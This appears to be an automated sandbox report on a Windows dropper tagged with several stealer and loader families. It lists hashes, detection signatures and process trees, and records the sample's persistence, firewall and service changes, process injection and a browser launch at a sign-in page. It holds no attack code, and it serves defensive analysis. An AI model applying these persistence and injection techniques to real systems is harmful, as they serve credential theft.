Malware Analysis Report

2024-11-13 19:10

Sample ID 231111-3by91scf82
Target f534581316136ede6cfa37da028420f0.exe
SHA256 0e6dbb451f85e0c7ead1cf375691503963da6fb35f902e6dd2a8d0bbd825ad9e
Tags
glupteba mystic redline smokeloader stealc zgrat taiga up3 backdoor dropper evasion infostealer loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0e6dbb451f85e0c7ead1cf375691503963da6fb35f902e6dd2a8d0bbd825ad9e

Threat Level: Known bad

The file f534581316136ede6cfa37da028420f0.exe was found to be: Known bad.

Malicious Activity Summary

glupteba mystic redline smokeloader stealc zgrat taiga up3 backdoor dropper evasion infostealer loader persistence rat spyware stealer trojan

Detect Mystic stealer payload

Stealc

Detect ZGRat V1

ZGRat

Mystic

RedLine

SmokeLoader

Glupteba payload

RedLine payload

Glupteba

Downloads MZ/PE file

Stops running service(s)

Modifies Windows Firewall

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of SetThreadContext

AutoIT Executable

Launches sc.exe

Enumerates physical storage devices

Program crash

Unsigned PE

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-11 23:21

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-11 23:21

Reported

2023-11-11 23:23

Platform

win10v2004-20231023-en

Max time kernel

48s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f534581316136ede6cfa37da028420f0.exe"

Signatures

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\f534581316136ede6cfa37da028420f0.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZJ1Rn98.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fI3fF09.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oN7wX13.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Qz85GM.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Qz85GM.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Qz85GM.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Qz85GM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Qz85GM.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Qz85GM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Conhost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1012 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\f534581316136ede6cfa37da028420f0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZJ1Rn98.exe
PID 1012 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\f534581316136ede6cfa37da028420f0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZJ1Rn98.exe
PID 1012 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\f534581316136ede6cfa37da028420f0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZJ1Rn98.exe
PID 4208 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZJ1Rn98.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fI3fF09.exe
PID 4208 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZJ1Rn98.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fI3fF09.exe
PID 4208 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZJ1Rn98.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fI3fF09.exe
PID 1068 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fI3fF09.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oN7wX13.exe
PID 1068 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fI3fF09.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oN7wX13.exe
PID 1068 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fI3fF09.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oN7wX13.exe
PID 2836 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oN7wX13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe
PID 2836 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oN7wX13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe
PID 2836 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oN7wX13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe
PID 4712 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4712 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 548 wrote to memory of 4856 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 548 wrote to memory of 4856 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4712 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4712 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1280 wrote to memory of 3028 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1280 wrote to memory of 3028 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4712 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4712 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4944 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4944 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4712 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4712 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4524 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4712 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4712 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 4104 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 4104 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4712 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4712 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4712 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4712 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1200 wrote to memory of 4532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1200 wrote to memory of 4532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 940 wrote to memory of 448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 940 wrote to memory of 448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4712 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4712 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4488 wrote to memory of 1804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4488 wrote to memory of 1804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4712 wrote to memory of 3376 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4712 wrote to memory of 3376 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3376 wrote to memory of 5052 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3376 wrote to memory of 5052 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4712 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4712 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4296 wrote to memory of 2276 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4296 wrote to memory of 2276 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2836 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oN7wX13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2so2416.exe
PID 2836 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oN7wX13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2so2416.exe
PID 2836 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oN7wX13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2so2416.exe
PID 4148 wrote to memory of 5604 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2so2416.exe C:\Windows\System32\Conhost.exe
PID 4148 wrote to memory of 5604 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2so2416.exe C:\Windows\System32\Conhost.exe
PID 4148 wrote to memory of 5604 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2so2416.exe C:\Windows\System32\Conhost.exe
PID 940 wrote to memory of 5648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 940 wrote to memory of 5648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 940 wrote to memory of 5648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 940 wrote to memory of 5648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 940 wrote to memory of 5648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 940 wrote to memory of 5648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\f534581316136ede6cfa37da028420f0.exe

"C:\Users\Admin\AppData\Local\Temp\f534581316136ede6cfa37da028420f0.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZJ1Rn98.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZJ1Rn98.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fI3fF09.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fI3fF09.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oN7wX13.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oN7wX13.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ph31Rm1.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

